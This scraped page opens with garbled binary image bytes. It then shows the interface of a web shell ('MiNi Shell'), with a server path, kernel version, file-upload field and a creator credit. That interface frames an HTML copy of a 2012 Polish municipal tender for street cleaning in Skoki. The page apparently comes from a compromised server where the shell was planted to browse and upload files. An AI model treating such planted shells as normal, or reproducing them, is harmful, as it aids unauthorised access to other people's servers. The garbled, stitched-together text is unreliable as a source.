JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121121/245791-N-2012.html

<p class="kh_header"><b>Skoki: Usługi komunalne związane z utrzymaniem czystości i porządku w m. Skoki w okresie od 01stycznia 2013r. do 31grudnia 2013r.</b><br>
<b>Numer ogłoszenia: 245791 - 2012; data zamieszczenia: 21.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Skoki , ul. Ciastowicza 11, 62-085 Skoki, woj. wielkopolskie, tel. 061 8925801, faks 061 8925803.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> htttp://skoki.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi komunalne związane z utrzymaniem czystości i porządku w m. Skoki w okresie od 01stycznia 2013r. do 31grudnia 2013r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres usług objętych przetargiem
Zamówienie dotyczy następujących ulic i placów w Skokach
Nazwa ulicy, placu
1. Kościelna
2. Jana Pawła II z parkingami
3. Wągrowiecka (do skrzyżowania z ul. Mickiewicza i Dworcową, łącznie z parkingiem przy Gminnym Ośrodku Zdrowia)
4. Rynkowa
5. Ciastowicza
6. Kazimierza Wielkiego z parkingiem
7. Plac Powstańców Wlkp.
8. Plac Strażacki
9. Dworcowa
10. Dąbrowskiego
11. Parkowa do skrzyżowania z ul. Rościńską (obwodnica)
12. Rakojedzka (od ul. Antoniewskiej do ul. Granicznej)
13. Okrężna
14. Poprzeczna
15. Podgórna
16. Osiedlowa
17. Graniczna
18. Poznańska (od ul. Kościelnej do nieruchomości nr 23)
19. Rościńska do skrzyżowania z ul. Parkową
20. Rogozińska (od skrzyżowania do parkingu przed wejściem głównym do hali sportowej i gimnazjum łącznie z parkingami i nawrotem do autobusów szkolnych
21. Zamkowa 
22. Antoniewska do skrzyżowania z ul. Topolową
23. Sienkiewicza
24. Mickiewicza 
25. Pogodna
26. Kręta
27. Rościńska przylegająca do cmentarza
28. dojście piesze od ul. Parkowej do stadionu KS Wełna i kościoła 
29. Słowackiego
30. Polna
31. Akacjowa
32. B. Głowackiego
33. Kościuszki do ul. Rakojedzkiej
34. Kasztanowa
35. Lipowa
Zakres prac związanych z utrzymaniem porządku i czystości na w.wym. ulicach i   
placach obejmuje:

1. Pozimowe sprzątanie ulic, placów i parkingów (jednorazowo) w terminie do dnia
31.03.2013r.
W ramach pozimowego sprzątania ulic, placów i parkingów z piasku i innych zanieczyszczeń po okresie zimowym wykonawca zobowiązany jest dodatkowo do oczyszczenia z liści, papierów, butelek plastikowych itp. przylegających do ulic żywopłotów przy ul. Poznańskiej, Wągrowieckiej i Ciastowicza. Długość żywopłotów ok. 250 m.
Zamawiający wymaga użycia do zamiecenia ulic, placów i parkingów po okresie zimowym zamiatarki.  
2. Pozimowe sprzątanie i zamiatanie chodników (jednorazowo) w terminie do dnia 31.03.2013r.
W ramach pozimowego sprzątania chodników wykonawca zobowiązany jest do oczyszczenia chodników z piasku i innych zanieczyszczeń po okresie zimowym. Pozimowym sprzątaniem
Chodników objęte są następujące ulice:
Kościelna, Plac Powstańców Wlkp., Jana Pawła II, Ciastowicza, Kazimierza Wielkiego, Dworcowa, Rakojedzka, Antoniewska, Rościńska, Poznańska i Parkowa na pow.                         ok. 11.000 m2  
3 Sprzątanie ulic, placów przejść pieszych i parkingów w Skokach objętych zamówieniem w okresie od 01.04.2013r. do 30.11.2013r. na powierzchni ok. 64.367 m2.
Sprzątanie ulic, placów, przejść pieszych i parkingów obejmuje ich zamiatanie oraz oczyszczanie z papierów i innych odpadów oraz zanieczyszczeń a szczególnie w okresie jesiennym z opadających liści.
Zamawiający wymaga, aby wykonawca w ramach tego zadania:
a) wykonał generalne sprzątanie przejścia pieszego od ul. Parkowej do stadionu KS Wełna przed Dniami Skoków oraz odcinka ul. Rościńskiej wzdłuż cmentarza przed Dniem Święta Zmarłych - 01.11.2013r.
b) w miesiącu październiku i listopadzie 2013r. uporządkował ulice, place i parkingi a także przyległe chodniki z opadłych liści, 
c) oczyszczał systematycznie przylegające do ulic żywopłoty z papierów, butelek, liści                  i innych zanieczyszczeń.

Zamiatanie ulic, placów, parkingów i przejść pieszych winno odbywać się sprzętem mechanicznym a w razie konieczności również ręcznie z następującą częstotliwością, a mianowicie:



3.1 dwa razy w miesiącu ( a w razie potrzeby częściej )- w pierwszych 7 dniach miesiąca oraz w trzecim tygodniu miesiąca
Nazwa ulicy; Powierzchnia jezdni do zamiatania i sprzątania w m2; Długość ulicy,
Placu w m
1.Kościelna; 2380 m2; 305 m
2.Jana Pawła II + parkingi; 3700 m2; 330 m
3. Rynkowa; 90 m2; 30 m
4.Wągrowiecka + parkingi; 1900 m2; 460 m
5. Ciastowicza; 1480 m2; 215 m
6. Kazimierza Wielkiego + parking; 1700 m2; 270 m
7. Plac Powstańców Wlkp.; 3500 m2; 130 m
8. Plac Strażacki; 600 m2; 20 m
------------------------
Razem: (I zakres) 15350 m2; 1760 m


3.2.1 dwa razy w miesiącu: w pierwszych 7 dniach miesiąca oraz w trzecim tygodniu miesiąca w miesiącach: kwiecień, czerwiec, sierpień, październik i listopad.
3.2.2 raz w miesiącu w drugim tygodniu miesiąca w miesiącach: maj, lipiec, wrzesień.
Nazwa ulicy, placu;  Powierzchnia jezdni do zamiatania i sprzątania w m2; Długość ulicy
w m
1. Dworcowa; 1900 m2; 270 m
2. Dąbrowskiego; 750 m2; 130 m
3. Parkowa; 3000 m2; 550 m
4. Rakojedzka; 3300 m2; 600 m
5. Poznańska; 2300 m2; 390 m
6. Rogozińska; 1800 m2; 250 m
7. Kościńska; 2700 m2; 450 m
8. Antoniewska; 2500 m2; 500 m
9. Wągrowiecka od skrzyżowania z ul. Ciastowicza; 1750 m2; 350 m
-----------------------
 Razem; (II zakres) 20000 m2; 3490 m


3.3 jeden raz w miesiącu w czwartym tygodniu miesiąca
Nazwa ulicy, placu; Powierzchnia jezdni do zamiatania i sprzątania w m2; Długość ulicy
w m
1. Zamkowa; 2200 m2; 390 m
2. Sienkiewicza; 1800 m2; 300 m 
3. Mickiewicza; 1760 m2 ; 320 m
4. Pogodna; 1900 m2; 340 m
5. Kręta; 570 m2; 190 m
6. Okrężna; 2800 m2; 550 m
7. Poprzeczna; 1450 m2; 250 m
8. Osiedlowa; 1700 m2; 340 m
9. Graniczna; 1450 m2; 280 m
10. Podgórna; 1800 m2; 360 m
11. Rościńska przy cmentarzu; 1600 m2; 280 m
12. Przejście piesze do kościoła i stadionu; 270 m2; 90 m
13. Słowackiego; 605 m2; 110 m
14. Polna; 750 m2; 150 m
15. Akacjowa; 1800 m2; 360 m
16. B. Głowackiego; 770 m2, 151 m,
17. Kościuszki do Rakojedzkiej; 3560 m2, 784 m,
18. Kasztanowa; 1700 m2, 340 m,
19. Lipowa; 532 m2, 133 m           
-------------------------------
Razem: (III zakres) 29017 m2, 5718 m


4. Opróżnianie koszy ulicznych z ulic i placów objętych zamówieniem i zbieranie śmieci typu kartony, papiery, butelki, opakowania itp. z chodników do nich przyległych oraz żywopłotów w terminie od 01 stycznia 2013r. do 31 grudnia 2013r. przy zachowaniu następującej częstotliwości: wszystkie ulice i place objęte zamówieniem codziennie z wyjątkiem niedziel i dni świątecznych  w łącznej ilości ok. 106 szt. koszy.   

Miejsce ustawienia koszy (nazwa ulicy,placu); Ilość koszy w szt.
1. Ciastowicza 6 szt.
 2. Zamkowa 2 szt.
 3. Sienkiewicza 1 szt.
 4. Wągrowiecka 7 szt.
 5. Jana Pawła II 11 szt.
 6. Plac Powstańców Wlkp. 10 szt.
  7. Plac Strażacki 1 szt.
  8. Kościelna 12 szt.
  9. Poznańska 4 szt.
 10. Kościńska 6 szt.
  11. Kazimierza Wielkiego 6 szt.
  12. Dworcowa 3 szt.
  13. Rakojedzka 5 szt.
  14. Okrężna 6 szt.
  15. Poprzeczna 3 szt.
  16.Antoniewska 4 szt.
  17. Rogozińska 5 szt.
  18. Parkowa 3 szt.
  19. Kręta (plac zabaw) 2 szt.
  20. Polna (plac zabaw) 3 szt.
  21. Dąbrowskiego 1 szt.
  22. Podgórna (plac zabaw) 3 szt.
  23. Osiedlowa 1 szt.
  24. Graniczna  1 szt.
----------------------------
  Razem: 106 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dodatkowe sprzątanie (zamiatanie) ulic poza wyznaczonym okresem uzależnione od warunków atmosferycznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium przetargowego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie aktualnej decyzji Starosty w zakresie zbierania i transportu odpadów związanych ze świadczoną usługą komunalną.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz sprzętu jakim dysponuje wykonawca do wykonania zamówienia - zamiatarka mechaniczna samojezdna względnie ciągnikowa - 1 szt.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie opłaconej polisy potwierdzającej, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min 100.000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://skoki.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Skokach
ul. Ciastowicza 11
62-085 Skoki
Pok. Nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy w Skokach
ul. Ciastowicza 11
62-085 Skoki
Sekretariat po. Nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com